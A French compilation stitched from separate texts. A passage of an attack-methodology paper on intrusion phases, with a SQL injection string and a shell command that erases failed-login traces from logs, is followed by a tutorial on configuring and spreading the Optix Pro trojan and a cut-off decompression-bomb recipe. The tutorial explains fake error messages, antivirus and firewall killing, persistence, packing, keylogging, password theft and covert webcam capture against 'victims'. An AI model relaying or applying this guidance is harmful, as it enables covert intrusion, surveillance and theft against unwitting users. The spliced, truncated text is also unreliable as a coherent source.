technique dite de Hijacking, où l.agresseur vient se synchroniser sur la connexion existante en
reprenant ses paramètres (paramètres TCP tels que AN/SN/Window/.) et en la coupant du
client légitime.

15 Le « cassage » du chiffrement est hors de portée de la plupart des pirates, sauf cas précis où les
informations de chiffrement ont été exposées (compromission des clefs privées ou des certificats).
16 ssh insertion attack, Core SDI, http://www.core-sdi.com/soft/ssh/ssh-advisory.txt
17 Hunt 1.5 par Pavel Krauz, http://lin.fsid.cvut.cz/~kra/index.html#HUNT

5.2 Exploitation de fautes d.implémentation
La grande majorité des incidents récents sont à déplorer du fait de bugs dans les logiciels
permettant d.en prendre le contrôle à distance, ou d.élever ses privilèges en local. Les fautes



d.implémentation ont toujours été un des problèmes majeurs de la sécurité, car impossibles à
éradiquer complètement. Souvent, seuls des correctifs venant du constructeur (patchs) sont en
mesure de résoudre le problème.

Les fautes d.implémentation sont tellement importantes et courantes que de nombreux pirates
analysent eux-même les codes sources de services réseaux largement utilisés, ou
désassemblent les applications commerciales afin d.y trouver des erreurs d.implémentation
qu.ils pourront utiliser pour manipuler le serveur distant. Il en résulte qu.un nombre non
négligeable de programmes destinés à tirer parti de ces failles (appelés exploits ou warez) est
rendu public chaque semaine, et qu.un « marché » parallèle est organisé entre groupes pirates
pour la diffusion restreinte d.exploits non publics donc plus efficaces (0-day).
La découverte et la correction de ce type de failles se fait le plus souvent par leur découverte par
des particuliers amateurs ainsi que dans les laboratoires de recherche de sociétés de sécurité,
ou par la découverte d.exploits circulant dans les milieux undergrounds18.
Les applications développées en interne, telles que les scripts CGI, sont aussi susceptibles
d.être affectées par de tels bugs, et l.analyse empirique de ces programmes est souvent
l.alternative la plus facile qu.il reste au pirate quand les failles connues sont corrigées.

5.2.1 Buffer overflows
La famille des buffer overflows a été décrite comme « faille de la décennie », et l.une des
premières utilisations connues de ces bugs a été le fameux « Morris Worm » qui paralysa
Internet fin 1988. C.est en fait une famille de failles, due à une erreur de code extrêmement
commune consistant à ne pas vérifier la taille de zones mémoire lors de la copie/lecture/. de
ces zones. En effet, de nombreux langages comme le C, pour des raisons d.optimisation et de
souplesse, ne vérifient pas les tailles des zones mémoires et laissent l.utilisateur libre d.accéder
à des octets hors des zones allouées : le programmeur se doit de vérifier lui-même qu.il ne tente
pas de lire ou d.écrire à des adresses non attribuées.
Les possibilités d.exploitation de ce problème sont nombreuses. En particulier, la technique des
buffer overflows la plus répandue consiste à utiliser la non-vérification des tailles de chaînes de
caractères d.un tableau à un autre pour écraser les octets qui suivent le tableau de destination
en mémoire. Le pirate, en exploitant une telle vulnérabilité, peut écraser des données
intéressantes en mémoire, telles que d.autres variables (un UID Unix sauvegardé, un nom de
fichier, .) et détourner le flux normal du programme. Une variable couramment écrasée pour
exploiter un programme vulnérable est l.adresse de retour des fonctions. Sur la plupart des
architectures et des compilateurs19, lors de l.appel à une fonction, l.adresse de retour de cette
fonction est stockée en mémoire dans la pile d.exécution du programme. Modifier cette valeur en
mémoire permet donc de contrôler où le programme sera aiguillé une fois la fonction terminée :
typiquement, le pirate détourne le flux du programme vers une zone mémoire contenant un
morceau de code dit shellcode, qui exécute une commande.

De telles failles dans les services réseaux tels que les serveurs de mail ou les serveurs
FTP/HTTP/. sont découvertes régulièrement et permettent de prendre le contrôle de la
machine affectée, en détournant le flux du serveur et lui faisant exécuter par exemple un shell.


18 à noter à ce propos la conférence de Marcus J. Ranum (NFR) au salon BlackHat 2000 : « Full
disclosure and Open Source » http://www.blackhat.com/html/bh-multi-media-archives.html
19 des attaques de type buffers overflows ont été démontrées pour quasiment toutes les plates-formes
actuelles.

Un des exemples les plus récents de buffer overflow a été celui découvert par Covert Labs de
Network Associates20 dans le serveur de noms Bind 8.2 d.ISC, permettant de prendre le contrôle
d.une machine par l.intermédiaire de Bind, et pour lequel des exploits circulent.

5.2.2 Attaques format string
Une nouvelle classe de failles récemment découverte (fin 1999) impliquent la modification
d.octets en mémoire par le biais de chaînes de formatage. Lorsqu.un programme écrit en C
génère un message contenant des variables (par exemple un message d.erreur destiné à être
affiché ou enregistré dans un fichier), il formate l.apparence de ce message par des caractères
spéciaux (formateurs) tels que %s, %d, .. Certains de ces caractères spéciaux (%n) permettent
d.écrire en mémoire. Si l.utilisateur peut injecter des formateurs dans le message, il peut
construire un message qui ira réécrire l.adresse de retour (comme dans le cas précédent des
buffer overflows) ou toute autre zone mémoire.
Ce type d.attaques implique la modification de variables en mémoire et est donc souvent
assimilé à la famille des buffer overflows.

5.2.3 Métacaractères shell et caractères spéciaux
De nombreux scripts CGI écrits en Perl ou en script shell Unix font appels à des commandes
externes Unix, comme par exemple /usr/bin/sendmail pour envoyer un mail. La ligne de
commande est potentiellement construite avec des paramètres rentrés par l.utilisateur dans le
formulaire. Si aucune vérification de cette entrée n.est effectuée (telle que, filtrer les caractères
non alphabétiques), des caractères spéciaux dits métacaractères peuvent être injectés pour
exécuter des commandes. Ces caractères spéciaux sont en particulier les séparateurs Unix tels
que ;, &, |, ( ), `, 0xff, ..
Par extension, ce type de faille affecte aussi les pages faisant appels à des bases de données.
L.insertion de caractères spéciaux SQL permet d.imbriquer une requête SQL dans la requête
construite à partir de l.entrée utilisateur :
L.instruction
SQL SELECT * FROM users WHERE user=’$form.user’ AND password=’$form.password’
devient
SELECT * FROM users WHERE user=’’ ; INSERT INTO users VALUES
(‘hacked’,’hacked’) ;’ AND password=’’

5.2.4 Virus, chevaux de Troie
Dans le cas d.une attaque directe inefficace, le pirate envoie un virus ou cheval de Troie à une
des adresses e-mail découvertes dans la phase de recherche environnementale. Cette attaque
nécessite l.acceptation du message par les filtres antivirus et l.exécution du programme par la
victime (même si certains clients mails comme Outlook ont eu des bugs permettant l.exécution
automatique de scripts à la réception du message ou à son ouverture).
L.agresseur, pour plus de fiabilité, développe son propre virus ou cheval de Troie. Il ne sera ainsi
pas reconnu par les antivirus à base de signatures. Le cheval de Troie récupère les mots de
passe et les envoie au pirate, ou établit une connexion à travers le firewall vers une machine
extérieure qu.il contrôle (technique de reverse-shell).
Un des exemples récents les plus connus de telles attaques est la compromission de l.intranet
Microsoft par une variante du virus QaZ, rendue publique en octobre 2000.

20 http://www.pgp.com/research/covert/advisories/047.asp


5.3 Elévation des privilèges
L.accès initial à une machine compromise par un pirate est souvent un accès non privilégié. Il
s.attache alors à élever ses privilèges vers les droits root sous Unix ou Administrateur sous
Windows NT.
Les techniques employées pour ce faire sont les mêmes que celles utilisées précédemment
pour gagner le premier accès. La méthode la plus courante est l.utilisation d.un buffer overflow
sur un programme local setuid root sous Unix, ou des permissions déficientes dans les fichiers
(C:) et la base des registres sous Windows NT.

6. Progression
Le pirate doit dans un premier temps nettoyer toute trace de son intrusion puis ensuite s.installer
pour revenir plus facilement sur le système compromis. Une fois la passerelle vers le système
d.information pénétré établie, il progresse rapidement ou lentement, furtivement, pour atteindre
le but qui le motive : vol d.informations, destruction de systèmes de production, ..
6.1 Inspection du système compromis
Les solutions de sécurisation des fichiers systèmes et journaux sont maintenant faciles à
déployer, et de nombreuses organisations ont recours à des systèmes de détection d.intrusion
dits « host-based » pour stopper à temps les pirates.

L.agresseur ayant gagné le contrôle d.une machine examine donc celle-ci afin d.y déceler tout
d.abord la présence d.un administrateur système qui pourrait noter le comportement suspect du
pirate. L.activité des utilisateurs eux-mêmes est aussi un bon moyen de se fondre dans le
système pour ne pas être repéré. Il utilise donc les utilitaires Unix standards tels que who,
whodo, last pour vérifier la fréquence de login des administrateurs, netstat pour inspecter
les éventuelles connexions non répertoriées dans les fichiers journaux, ..

Une fois le facteur humain éliminé, car c.est celui qui peut réagir le plus rapidement et qu.il est
impossible de modifier, il examine les processus actifs ainsi que le système de fichiers pour
trouver d.éventuels systèmes de surveillance ou IDS. Il utilise pour ce faire les outils standards
tels que ps, et examine les fichiers ouverts (avec l.utilitaire lsof) et les derniers fichiers
modifiés du disque, probablement des fichiers journaux ( /var/adm, /var/log, .). Il inspecte
les fichiers d.exécution programmée tels que crontab ou at afin de déterminer la fréquence
des backups et la potentialité que ses outils d.intrusion ou les fichiers journaux contenant des
traces aient été sauvegardés dans les backups précédents. Il détermine alors si des traces de
l.attaque ont été enregistrées et s.il lui est possible d.effacer ces traces sans en créer de
nouvelles (cas des systèmes de surveillance des fichiers comme Tripwire21). Il inspecte aussi les
configurations des systèmes de journaux tels que syslogd afin de voir une éventuelle copie
automatique des journaux vers d.autres machines (loghost dans /etc/hosts sous Unix). Les
sessions shell étant communément enregistrées pour des raisons de commodité (possibilité de
revenir à des commandes antérieures), il vérifie aussi que le shell qu.il utilise n.enregistre pas
d.historique (~/.bash_history, ~/.sh_history).

6.1.1 Nettoyage du système
Le pirate dispose alors d.une information précise sur les moyens de protection et de surveillance
en place sur la machine. Il décide alors s.il lui est possible de nettoyer les traces qu.il a laissé.
Ce nettoyage n.est en effet pas systématique car il peut introduire des traces beaucoup plus
importantes, notamment au niveau des systèmes de surveillance de fichiers comme Tripwire. Il
cherche cependant à nettoyer au maximum, en compromettant ces systèmes (modification des
bases de référence Tripwire si celles-ci sont stockées sur un support modifiable, ou backdoor
kernel comme nous le verrons dans la partie suivante).

L.enregistrement de session suivant montre un pirate nettoyant les traces de ses tentatives de
connexion sur le serveur ftp d.une machine Solaris qu.il a par la suite réussi à compromettre :

21 http://www.tripwire.com/


# cd /var/adm
# ls –l messages
-rw-r--r-- 1 root other 18244 Jan 7 12:29 messages
# tail –1 messages
Jan 7 12:29:52 solserv ftpd[10216]: bcomora (bogus) LOGIN FAILED [from
192.168.38.6]
# grep -v FAILED messages > .yo ; mv .yo messages

Il nettoie ensuite l.espace disque libre où les données de ses fichiers effacés sont toujours
présentes.

Si jamais le pirate ne peut pas effacer ses traces, il surveille régulièrement la machine afin de
déterminer si les administrateurs se sont aperçus de son intrusion et pouvoir l.évacuer
rapidement dans le cas positif.

6.1.2 Pose de backdoors
L.accès à un système par exploitation d.un des services est une tâche potentiellement difficile et
surtout bruyante. Le pirate se crée donc ensuite des portes détournées, dites backdoors, qui lui
permettront de revenir plus facilement sur le système.
Les backdoors peuvent être des plus simples (remplacement du programme de login par un
programme disposant d.un mot de passe générique) aux plus complexes, mettant en jeu des
modifications du système d.exploitation même, pouvant masquer jusqu.à la présence des
fichiers et des processus, voire de certains types de paquets réseau.

Les backdoors fréquemment utilisées sont :
- L.ajout de programmes d.apparence innocents introduisant des flux furtifs (« covert
channels ») dissimulant des commandes dans des flux standards (requêtes Web vers
l.extérieur, requêtes DNS ou ICMP, .).
- Des modifications de programmes tels que sshd, le serveur de connexions sécurisées
chiffrées. Le pirate installe une version modifiée du programme sshd qui lui permet de
revenir en se connectant sans trace, et avec une connexion chiffrée, évitant ainsi les IDS
réseau situés sur d.autres machines.
- L.insertion de modules kernels, normalement utilisés pour rajouter des pilotes
périphériques au vol, permet de modifier le noyau du système d.exploitation. Le pirate a
alors un contrôle complet sur le système, donc en particulier sur les logiciels de
surveillance, car ils font tous appels au système d.exploitation, censé être fiable.
Certaines backdoors kernel publiées récemment ont même la possibilité d.intercepter
des commandes envoyées par le pirate dans du trafic réseau bénin et de masquer ce
trafic aux sniffers en ne leur remontant pas les paquets22. Sur les systèmes ne disposant
pas de support des modules kernels, l.agresseur recompile un nouveau noyau
(/boot.img, /vmunix) ou modifie le noyau au vol par accès direct à la mémoire au
travers des fichiers /dev/mem, /dev/kmem ou /proc.


22 plaguez, .Weakening the Linux kernel., http://phrack.infonexus.com/search.phtml?view&article=p52-18


6.2 Prise d.information, progression
Suivant ce que le pirate cherche, il examine le comportement des utilisateurs afin d.identifier ses
prochaines cibles.
Il détermine le rôle de la machine sur laquelle il est par son nom, les fichiers qui y sont stockés,
le nombre et le type des utilisateurs. Il trouve les utilisateurs à suivre en regardant les fichiers de
mots de passe (/etc/passwd et /etc/group), où les attributions de chacun sont souvent
détaillées (par exemple : groupe des développeurs, groupe marketing, .).
Les fichiers de profil (/etc/profile, ~/.profile) des utilisateurs lui donnent des informations
intéressantes, comme par exemple les variables d.environnement des programmes tels que
CVS dans le cas de l.attaque d.un laboratoire de recherche. CVS ou ClearCase, largement
utilisés pour le contrôle des versions de projets, positionnent des variables d.environnement sur
le poste client donnant le nom des serveurs de développement où sont stockées les sources.
L.intrus cherche donc ces variables s.il s.attaque à des secrets industriels tels que des codes
sources. Il inspecte aussi les historiques des shells utilisateurs, pour déterminer vers quels
serveurs se connectent les développeurs.

Finalement, le pirate réitère autant de fois que nécessaire les phases d.exploitation et de
progression. Le rapatriement des informations capturées se fait par l.intermédiaire de backdoors
de type « covert channel » .



7. Conclusion
Nous avons vu le déroulement typique d.une attaque sur Internet : une phase de recherche
environnementale, où l.agresseur identifie sa cible, une phase de scanning, permettant de
trouver des services potentiellement exploitables, l'intrusion proprement dite puis finalement la
progression dans le système compromis. Les deux dernières phases sont ensuite reproduites
sur les systèmes internes, en se servant de la première machine capturée comme point de
départ. Cet exemple de déroulement, que l.on peut qualifier de tactique empirique, est valable
quelle que soit la motivation du pirate et ses compétences : seuls les moyens mis en oeuvre et le
raffinement technique des méthodes vont varier. L.établissement de lignes de défense adaptées
passe par la compréhension de ces mécanismes, en particulier en ce qui concerne la détection
des intrusions et la récupération d.un système après un incident.Nous avons fait un pas en avant pour comprendre comment les pirates opéraient, il reste à voir pour très bientot l'utilisation d'outils spécifique afin de mener à bien cette intrusion

Tutos optix pro

1-Intro
2- créer un serveur
2.1 Main Setting
2.2 Startup & Installation
2.3 Notification
2.4 Firewall & AVS Evasion
2.5 Enhanced Options
3- utiliser le client (traduction des fonctions)

---
1- Intro
---

Optix Pro est un "trojan" (aussi appelé Backdoor, cheval de Troie, troyen, trojan horse...) et est utilisé pour contrôler un ordinateur à distance via l'internet. Il doit être utilisé par quelqu'un qui désire contrôler ce qui se passe sur son propre ordinateur lorsqu'il est absent. Si vous l'utilisé d'une autre manière (en installant le fichier serveur sur un ordinateur dont vous n'êtes pas le propriétaire, par exemple) vous pourriez vous attiré de gros ennuis parce que c'est illégal dans la 'plupart' des pays. En aucun cas l'auteur de ce texte ne pourra être tenu responsable de votre choix d'agir dans l'illégalité.

Pour prendre contrôle d'un ordinateur avec Optix Pro 1.3, on doit d'abord créer un fichier serveur qui devra ensuite être exécuté sur l'ordinateur cible. Ce serveur est un petit programme qui se cache dans l'ordinateur, une fois exécuté, et qui redémarre avec Windows. Le serveur est la partie essentielle du trojan; c'est lui qui exécute toutes les commandes voulues sur l'ordinateur cible (victime), par exemple en nous envoyant des captures d'écran ou de clavier ou alors en nous permettant de parcourir les fichiers de l'ordinateur cible. C'est également lui qui nous envoi une "notify", un message transféré par internet qui nous permet de garder la trace de la 'victime' a chaque fois qu'elle se connecte a internet.

Il faut donc créé un fichier serveur pour pouvoir utiliser Optix Pro. Pour ce faire, on utilise le programme builder.exe ; le builder est un "éditeur de serveur", il nous permet de créer un serveur personnalisé.

On utilise ensuite le fichier Client.exe pour connecter et contrôler l'ordinateur 'victime'. Le Client est la partie du programme qui nous permet d'envoyer nos instructions au serveur.

Le fichier serveur peut être envoyé par email, icq, irc etc. ou tout simplement être installé a partir d'une disquette ou d'un CD; il s'installe comme tous les programmes, c'est à dire en l'exécutant. Il est compatible avec la plupart des systèmes Windows (95/98/ME/NT/2000/XP)
En résumé:
Client.exe --) permet de contrôler l'ordinateur 'victime'
Builder.exe --) permet de créer un Server.exe personnalisé
server.exe --) doit être installé sur l'ordinateur 'victime' pour que le Client.exe puisse se connecté et contrôler cet ordinateur
---
2- créer un serveur personnalisé
---
Apres avoir downloader Optix pro 1.3, on ouvre le fichier Builder.exe afin de créé un server personnalisé.

2.1 Main Setting

Ensuite, on ouvre la section "main settings" et on clic sur "general Information". Plusieurs options s'offre alors à nous. Il est à noter que les options par défaut sont fonctionnelles. Il est inutile de changer quoi que ce soit sans raison, surtout si vous ne savez pas ce que vous faites. Dans ce texte, je vais expliquez la signification de chaque fonction une à une.
La section "notification string separators" permet de déterminer quel symbole sera utiliser par le serveur pour nous envoyer l'adresse IP de la victime par ICQ (ICQ notify). En effet, Optix Pro peut utiliser ICQ ( www.icq.com ) pour vous envoyer un avertissement a chaque fois que la victime est en ligne. ICQ utilise des filtres pour bloquer les messages envoyer par les trojans et Optix Pro permet de contourner ce problème en offrant a l'utilisateur la possibilité de configurer complètement le message ICQ qui sera envoyer. Au moment d'écrire ce texte, le symbole par défaut de la case "notification string separators" fonctionne. N'utilisé pas un point (.) pour le "ip adress separators", ICQ détecte les IPs sous ce format. Les deux symboles par défaut sont fonctionnels.

[n00bs Infos] L?adresse « IP », qui signifie simplement « Internet Protocol », permet d?identifier chaque ordinateur relié à Internet. À chaque connections internet, un ordinateur se voit attribué une IP. Elle est essentiel pour connecter l?ordinateur ?victime?, c?est elle qui permet au client de rejoindre le serveur. En gros, pas d?IP, pas de connections [/n00bs Infos]

Dans la section "Identification name", entrez un nom qui vous rappellera quel est le PC serveur (victime), par exemple le nick de la personne visée, son nom etc.

On doit d'abord choisir un port pour la section "Server Port". (Le port par default est 3410 et fonctionne bien) Inscrivez simplement un chiffre entre 1000 et 65000, ces ports ne sont généralement pas utilisés par Windows

On coche ensuite la case "Server password" et on choisit un mot de passe qui va être demandé lors de la connexion au server (afin d'éviter qu'un indésirable connecte le serveur). On re-tape ce mot de passe dans la section "confirmation (re-type)"

La section "Fake error" permet d'afficher un faux message d'erreur lors de l'exécution du server. De cette façon, on peut faire croire à celui qui installe le serveur que quelque chose n'a pas fonctionné tandis que le serveur s'installe tres bien "par en arrière"

Voici quelques exemples de faux message:

"cant load image file"
"Ce programme va s'arrêter car il a effectué une opération non conforme"
"image file is corrupted i/o error 54546"
"Le fichier dsapi.dll est introuvable"
etc. etc.
On passe ensuite à la section "Server Icon" pour choisir quelle icône le serveur se verra attribuée. On doit choisir cette icône en fonction de ce pourquoi on va faire passer le serveur. Si on prétend que le serveur est une image, il faut donc choisir l'icône approprié etc.
2.2 Startup & Installation

On passe ensuite à la section "Startup & Installation" et on clic ensuite sur « StartUp » On doit y choisir au moins une "StartUp method" pour que le serveur soit exécuté par Windows a chaque redémarrage de l'ordinateur.

[n00bs Infos] Lorsqu?un trojan est installé, on doit s?assurer qu?il va redémarrer avec Windows. De cette façon, on a pas a réinfecté la machine a chaque fois que l?utilisateur relance son système ! Comme n?importe quel programme qui se lance automatiquement avec Windows (par exemple MSN Messenger, les Anti-Virus et Firewall qui « ouvre tout seul » etc.), le trojan va utiliser des « startup Method » pour se relancer avec Windows
[/n00bs Infos]

Optix Pro offre 5 Startups Method. Je vous conseil d?utiliser les 4 premières, la cinquième étant parfois dommageable. Utilisez absolument la méthode « Registry RunService » si vous croyez que le serveur sera installé sous un système NT/2000/XP

On clic ensuite sur la section « file setup » pour choisir si le serveur va s'installé dans le dossier /windows/ ou /system/ et choisir un nom pour le serveur (Server File Name) par exemple windows.exe, winload.exe, system.exe...

La fonction "melt server after installation", si elle est sélectionnée, va auto-détruire le fichier server d'origine après l'installation (le serveur demeure fonctionnel puisqu'il s?est copier dans /windows/ ou /system/ selon ce que vous avez choisi)

2.3 Notification

On passe ensuite à la page "Notification". La notification, ou notify, c?est le message que le serveur vous envoi a chaque fois que l?ordi victime se connecte a internet. Il contien les informations essentielles pour se connecter : l?IP, le port et le password.

La section « ICQ Notification » permet de taper son UIN (numéro ICQ) pour recevoir un pager a chaque fois que le serveur connecte l'internet. C'est la méthode la plus utilisée. Il s?uffit de cliquer sur « ADD NEW » pour ajouter autant de numéro ICQ que l?on veut.

La section CGI permet de se faire notifier par un script CGI hébergé sur un web server
Optix Pro utilise le logger CGI disponible a http://www.bfndevelopment.com/ (documentation incluse). Voir le fichier cgilogger.zip. Cette méthode nécessite un hébergeur web qui accepte d?exécuter des scripts CGI, par exemple netfirms.com (gratuit)
Le MSN notify permet de recevoir la notification par MSN (duh!). Pour se faire, vous aurez besoin de 2 comptes MSN, un pour envoyer la notify (invisiblement, à partir du PC serveur) et un pour la recevoir (votre compte ordinaire). Pour activer cette fonction, on clique sur « ADD NEW ». La fenetre « Send To » apparaît, taper alors votre adresse hotmail correspondant au compte pour recevoir la notification. On clic ensuite OK. La fenetre « send From » apparaît, on y tape l?adresse email du deuxième compte, celui qui va être utilisé pour envoyer la notification à partir du PC serveur. On clic ensuite sur OK. La fenetre « Send From Password » apparaît. On tape le mot de passe du deuxième compte MSN, celui qu?on vient de remplir. Le PC serveur a besoin du mot de passe pour se connecter a MSN et envoyer la notification. On clic ensuite sur OK.
La section IRC Notification permet de recevoir une notification par miRC par exemple. Entrez simplement les coordonnés de votre server/port/channel irc préféré apres avoir cliqué sur « ADD NEW ». Pour plus d?information sur l?IRC, visitez http://www.mirc.com/irc.html (en anglais)

Le PHP Notify fonctionne comme le CGI Notify, mais l?hébergeur doir accepter les script PHP. Le script est aussi inclut, voir phplogger.zip

Le SMTP notify permet de recevoir un rapport (notify) par email à chaque fois que le server connect l'internet. Si vous ne connaissé pas de serveur SMTP Open Relay, vous devrez essayer de trouver quel est le serveur SMTP du fournisseur Internet de la future victime. Utilisez l?aide technique en ligne du fournisseur Internet (aides aux abonnés), vous y trouverez certainement le serveur SMTP.

[n00bs Infos] Un serveur SMTP, c?est un programme qui gère l?envoi de email. En général, on ne peut utiliser les SMTP, à moins d?être un utilisateur légitime. Par exemple, on peut utiliser le SMTP de notre fournisseur Internet pour envoyer des emails avec Outlook, Eudora etc., mais on ne peut utiliser le SMTP des autres fournisseurs Internet. Le trojan ne peut donc utiliser votre SMTP, il doit utiliser celui du fournisseur internet du PC serveur. Pour retracer le fournisseur internet de quelqu?un à partir de son IP, il est possible d?utiliser des outils en ligne comme www.samspade.org . Les serveur SMTP que l?on dit « Open Relay », pour leur par, accepte les connections peut importe l?origine. Ils peuvent donc être utilisé par un trojan. Malheureusement, ces SMTP disparaissent rapidement vu l?abus qu?en font les spammers [/n00bs Infos]

2.4 Firewall & AVS Evasion

La section "Firewall/Avs Evasion" permet d'éliminer les Anti-Virus et Firewall sur le PC server. La liste des programmes supportées est annexé a Optix Pro dans le fichier FirewallsAVS.txt.

Sélectionné « Enable killing Of in-built Firewalls » si vous ne voulez pas que les firewalls fonctionnent sur le PC serveur.

Sélectionné « Enable killing Of in-built Anti-viruses » si vous ne voulez pas que les Anti-Virus fonctionnent sur le PC serveur.

Sélectionné « Enable killing Of in-built Package » si vous ne voulez pas que des combos firewalls / anti-virus fonctionnent sur le PC serveur.

Vous pouvez aussi ajouter des programmes (exemple: netstat.exe, regedit.exe, regedit32.exe...) dans la section « Specific .EXE » et des services windows dans la section « NT/2K/XP Service »

2.5 Enhanced Options

Finalement, la section Enhanced Options offre des options de camouflage supplémentaire (serveur exe name et clé du registre) si vous considérez piéger un utilisateur très avancé, cette option pourrait être essentielle. Par contre, elle est nouvelle dans le monde des trojans, donc peut-être pas stable a 100%

Losque vos options sont toutes bien en place, cliqué sur "Build/Create Server" en haut du Builder. Il ne vous restes qu?a donner un nom à votre serveur et à l?enregistrer. Il est maintenant prêt a être installé. Il peut être renommé a condition qu'il conserve une extension exécutable (.exe, .com, .bat, .pif...). Conserver l?extension .exe pour ne pas perdre l?icône choisie. Il peut aussi être compressé (packed) ce qui permet de reduire la taille du server de moitié... Des programmes de compression peuvent être téléchargés de
Illcommunity.com
exetools.com
qwerto.cjb.net
etc.

Personnellement j?utilise UPX , masi les n00b préfererons peut-etre TElock qui est tres simple d?utilisation. Cette étape n?est pas essentielle.

Votre serveur est donc prêt a être installé. Vous pouvez maintenant l?envoyer à tout vos amis par email en pièce jointe, par DCC sur IRC, par transfert de fichier sur MSN, AIM etc. ou simplement le mettre sur une disquette ou un CD et l?exécuter sur l?ordinateur cible. Ensuite il ne vous reste qu?a attendre la notification choisie pour connetre l?IP du PC serveur, pour pouvoir enfin vous connecter et utiliser le Client.exe

---
3- utiliser le client (traduction des fonctions)
---
Client Sock --) Permet d?utiliser un serveur proxy pour être plus anonyme. A réserver aux paranoïaques.

Server Option--) Power operation --) Logoff/reboot/shut down/power off
permet de fermer ou rebooté windows

Server Option --) Power operation --) Blue Screen
écran bleue ( unrecoverable = irrécupérable ;)

Server Option --) Server Operation
Permet d'obtenir des info sur les options du server (get)
Closer server file = ferme le fichier server
Restart server file = redémare le fichier server
Remove server = Désinstalle le server (vous ne pourrez plus connecté)

Managers --) File Manager
pour se promener sur le c: de la victime ou tout autre partition
On optient d'abord les partitions en cliquand sur "Get Drives"
en cliquant de la droite sur un fichier, une liste d'options apparaient (download, delete...)
Managers --) Process Manager
Permet de listé et de tué les programmes actif sur le pc server

Managers --) Window Manager
Permet de listé et de tué les fenetres activent sur le pc server
"Change title" permet de renommé une fenetre

Managers --) Registry Manager
Permet de manipuler le registre (utilisateur avancé)

Managers --) FTP Manager
Permet d?ouvrir un serveur FTP sur le PC serveur avec port et password configurable. Parfais pour les Warez d00ds.

Managers --) SOCKS server
Permet d?ouvrir un serveur proxy sur le PC serveur.

[n00bs Infos] Un serveur Proxy permet d?être anonyme sur internet. Dans le cas d?Optix Pro, il vous permet d?utiliser l?IP du PC serveur pour surfer sur le web, vous connecter sur IRC etc. Les utilisateurs d?internet explorer peuvent ajouter un serveur proxy dans la menu
Outils --) options internet ?) connexion --) paramètres
Les utilisateurs de mIRC32 peuvent ajouter un proxy dans la section « Firewall » du menu « Connect ». Le serveur proxy agit comme une passerelle pour cacher votre IP
Vous --) votre fournisseur internet --) serveur proxy --) destination (site web, chan irc?)
[/n00bs Infos]

Managers --) Remote scanner
Permet de scanner une rangée d?IP à partir du PC serveur, pour trouver d?autres trojans ou des vulnérabilités. C?est l?IP du PC serveur qui apparaîtra dans la traînée de logs qui suit chaque scan ;)

Managers --) Port Redirect
Voir le tutorial concernant le port redirection a www.qwerto.cjb.net

Communication --) Message box
Permet de faire apparaître un faux message d'erreur sur le PC serveur
La case "test message" permet de testé le message sur vous même

Communication --) Matrix Chat
Chat avec la victime (server)
seul le client peut fermé le chat

Communication --) Client-2-Client Chat
Permet de « chatter » avec tous les clients connecté ! Change votre victime en serveur de chat perso (invisible pour la victime)

Spy Tools --) computer information
Permet de connaître le hardware du PC serveur etc.

Spy Tools --) Get Password
Vole des mots de passes
cached = enregistré (win 9x seulement)
AIM = AOL Instant Messenger
RAS = Connection(s) Internet (modem/ADSL) (Remote Acces Service)

Spy Tool --) Key Logger
Permet de voir en direct tout ce qui est tapé par la victime, ainsi que dans quelle fenetre cela est tapé. On clic sur "enable" pour démarré le key logger

PC Manipulation --) Screen / Mouse
Permet de faire des capture d?écran du PC serveur et de contrôler la sourie. Les captures peuvent être sauvegarder en format jpg

PC Manipulation --) Keyboard
Manipulation avancée du clavier, pour envoyer des frappes a la place du pc serveur. Idéal pour détruire une session de « chat » et pour briser des couples.

PC Manipulation --) Cam Capture
Permet de faire des captures à partir de la webcam de votre victime (pour voir sa tête)

PC Manipulation --) Send Keys (old)
Permet d'écrire à la place du serveur dans une fenetre donnée
le caractère | = [Enter]

Humor / Fun Stuff --) Originals
les fonctions habituelles
SHOW/HIDE START BUTTON: montre/cache le boutton "démarrer"
OPEN/CLOSE CD ROM: open/close cd-rom bordel!!! :)
SHOW/HIDE CLOCK: montre/cache l'horloge
Beep pc speeker 200x: envoit un son stridant et continu par les haut-parleurs
SHOW/HIDE TASK BAR: montre/cache la bar de tache
MONITOR ON/OFF: moniteur on/off
etc...

Humor / Fun Stuff --) Screen Printer
Permet de faire afficher des textes et couleurs ennuyants sur l?écran de la victime. Par exemple : « QwErTo ownz u »

Les denis de service par « decompression bomb’s »

 L’idée de base est simple mais il fallait y penser. La plupart des antivirus modernes on la capacité d’analyser des fichiers compressés avec une occurrence (zip dans un zip dans un zip poupées russes quoi) plus ou moins longue. En effet, ils permettent de dézipper plusieurs fois une archive afin de vérifier si les fichiers présents dans ces archives sont infectés. Ces opérations s’effectuent soit dans un espace temporaire dédié soit par le biais de la mémoire virtuelle (swap). L’idée est de créer un fichier zip de quelques kilos qui une fois dézippé dans son intégralité représente plusieurs pétaoctets de données et donc sature l’espace disque dédié ainsi que la charge du microprocesseur créant ainsi un déni de service (dos). Mais comment cela est-il possible ?

C’est très simple il suffit de créer un fichier rempli de zéro (ou autre caractère identiques) de plusieurs centaines de mégaoctets de le zipper. Les caractères étant répétitifs le résultat obtient un excellent taux de compression, par exemple un fichier de 4G0 rempli de zéro compressé avec le taux le plus élevé correspond à une archive zip de 4070k0 ce fichier est copié plusieurs fois puis les fichiers obtenus sont compressés a leur tour dans une archive zip. Cette opération est répété plusieurs fois de suite jusqu’à n’obtenir qu’une archive de quelques dizaine de kilo (en fait au bout de trois occurrence la taille ne diminue plus elle augmente légèrement mais la taille globale de l’archive elle augmente considérablement).

J’ai fais l’essai sous linux en shell script cela m’a pris cinq minutes pour créer le script et le résultat était surprenant.

Petit détail pour plus de compréhension

16 fichier zip de 4Mo correspondant à 4Go de zéro chacun zippés dans une seule archive qui ne fait plus que 161 Ko ce fichier est a sont tour copié 16 fois et zippé dans une archive qui ne fais que quelques centaines de 32Ko cet opération est répété 4 fois et on obtient un fichier zip de 53Ko environ. Il y a en tout 5 occurrences, donc la somme des fichiers et la somme de (16 puissance n) avec n allant de 1 à 6 donc pas moins de 17895696 fichiers. La taille totale de cette archive décompressée est de 76861429059158016 octets soit 68 pétaoctets environ.

Petit shémas pour enfoncer le clou :

4Go de zéros ->compressés->fermion0.dll -
4Go de zéros ->compressés->fermion1.dll |
4Go de zéros ->compressés->fermion2.dll |
4Go de zéros ->compressés->fermion3.dll |
4Go de zéros ->compressés->fermion4.dll |
4Go de zéros ->compressés->fermion5.dll |
4Go de zéros ->compressés->fermion6.dll |
4Go de zéros ->compressés->fermion7.dll | --> compressés --> quark(0 à f).dll --> compressés --> proton(0 à f).zip --
4Go de zéros ->compressés->fermion8.dll |
